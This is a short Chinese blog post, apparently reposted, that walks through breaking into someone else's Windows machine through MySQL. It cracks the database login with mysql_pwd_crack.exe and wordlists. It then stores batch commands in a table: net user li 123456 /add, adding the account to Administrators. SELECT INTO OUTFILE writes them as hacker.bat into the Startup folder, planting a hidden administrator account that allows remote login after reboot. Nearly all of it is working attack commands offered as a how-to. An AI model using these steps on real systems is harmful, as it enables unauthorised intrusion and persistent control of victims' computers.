本文共 852 字，大约阅读时间需要 2 分钟。

1.用mysql_pwd_crack.exe工具扫描对方mysql的用户名和密码

mysql_pwd_crack.exe 192.168.1.14 -x 3306 -a

字典文件分别命名为：user.dic  pass.dic 2.登陆对方的mysql（假设已经扫出用户名为为abc、密码为abc）

mysql -h 192.168.1.14 -u abc -p

3.创建数据库

create database aaa；

4.进入数据库

use aaa；

5.在数据库aaa中创建表bbb，字段名为ccc

 

create table bbb（ccc text）;

6.在表中插入批处理文件代码

insert into bbb values（“@echo off”）;  insert into bbb values（“net user li 123456 /add”）;  insert into bbb values（“net user li /active:yes”）;  insert into bbb values（“net localgroup Administrators li /add”）;

7.将批处理文件中的代码查询出来，并以批处理文件hacker.bat的格式保存在C:\\Documents and Settings\\Administrator\\「开始」菜单  \\程序\\启动\\目录下

SELECT * INTO OUTFILE 'C:\\Documents and Settings\\Administrator\\「开始」菜单\\程序\\启动\\hacker.bat' FIELDS TERMINATED BY ' ' ENCLOSED BY ' ' ESCAPED BY ' ' LINES TERMINATED BY '\n' FROM bbb;

测试结果：当对方重启计算机时，会发现他的计算机系统中会自动生成一个有管理员权限的用户li，并且用它可以远程登陆他的计算机。

转载地址：http://erjpi.baihongyu.com/